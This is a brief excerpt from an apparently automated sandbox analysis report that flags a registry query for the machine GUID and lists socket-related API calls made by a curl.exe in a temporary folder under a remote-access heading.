Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A2B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,		7_2_000000013F4A2B14
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4CF964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,		7_2_000000013F4CF964
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F322B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,		22_2_000000013F322B14
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F34F964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,		22_2_000000013F34F964